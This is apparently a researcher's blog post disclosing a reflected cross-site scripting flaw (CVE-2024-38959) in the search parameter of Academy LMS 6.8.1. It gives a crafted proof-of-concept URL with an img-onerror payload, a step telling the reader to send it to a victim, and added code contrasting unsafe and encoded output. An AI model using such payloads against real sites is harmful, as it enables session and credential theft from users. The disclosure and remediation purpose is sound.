Reflected Cross-Site Scripting in Academy LMS — Learning Management System (CVE-2024-38959)

Geet Madan
Jul 9, 2024

Dear Folks,

Hi, I am Geet Madan, an Independent Security Researcher.

This blog is about how I found a cross-site scripting vulnerability in Academy LMS version 6.8.1, which allows an attacker to perform a cross-site scripting attack via the string parameter of the application.

Affected Product and Its Version: Academy LMS — Learning Management System 6.8.1

CVE assigned to this vulnerability: CVE-2024-38959

Impact of this Vulnerability:

An attacker can use this cross-site scripting vulnerability to perform attacks such as:

- Stealing the victim's session cookies.

- Defacing the website by changing its content.

- Stealing the user's login credentials.

- Logging the victim's keystrokes (keylogging).

Demo Subdomain I used: https://demo.creativeitem.com/

Detailed explanation of how I found this Vulnerability.

Step 01: Open this URL in the browser: https://demo.creativeitem.com/. This application uses Academy LMS version 6.8.1.

Step 02: Append this path to the website URL: /academy/course_bundles/search/query?string="><img+src=x+onerror=alert(1)>geetmadan

For example:

If the target website is https://demo.creativeitem.com/

then after appending the vulnerable path with the payload, it will look like this:

Final Crafted URL: https://demo.creativeitem.com/academy/course_bundles/search/query?string="><img+src=x+onerror=alert(1)>geetmadan

Step 03: Send this URL to the victim.

Step 04: The payload executes in the victim's browser when the URL is opened.

This confirms the reflected cross-site scripting vulnerability in Academy LMS 6.8.1.
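
The fix for this class of bug is output encoding at the point where the search term is written back into the page. The sketch below is an added example, not Academy LMS source code and not part of the original post; it assumes the string value is echoed into a double-quoted HTML attribute (the post does not show the template), uses the placeholder host lms.example, and all function names are hypothetical.

```javascript
// Added example: hypothetical template code, not Academy LMS source.
// Assumption: the "string" value is echoed into a double-quoted attribute.

// Constructed sample request: placeholder host, path and payload from the post.
const SAMPLE_URL =
  'https://lms.example/academy/course_bundles/search/query' +
  '?string="><img+src=x+onerror=alert(1)>geetmadan';

// Decode the parameter as a server-side framework would ("+" becomes a space).
function queryFromUrl(url) {
  return new URL(url).searchParams.get('string') ?? '';
}

// Vulnerable pattern: raw concatenation into the attribute value.
function renderSearchUnsafe(query) {
  return '<input type="text" name="string" value="' + query + '">';
}

// Encode the characters that can close the attribute or open a new tag.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: encode at the point of output, for the HTML context.
function renderSearchSafe(query) {
  return '<input type="text" name="string" value="' + escapeHtml(query) + '">';
}

// Regression check: count tag openers in the rendered markup. The template
// contains exactly one tag, so any higher count means markup was injected.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

const query = queryFromUrl(SAMPLE_URL);
console.log('decoded :', query);
console.log('unsafe  :', renderSearchUnsafe(query), '->', countTags(renderSearchUnsafe(query)), 'tags');
console.log('safe    :', renderSearchSafe(query), '->', countTags(renderSearchSafe(query)), 'tags');
```

With the unsafe renderer the "> prefix closes the value attribute and the input tag, so the rest of the parameter is parsed as markup; with encoding the whole value stays inside the attribute as text.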

Author of this CVE:

Geet Madan.

Linkedin Profile: https://www.linkedin.com/in/geet-madan/

Thanks for Reading!! :)
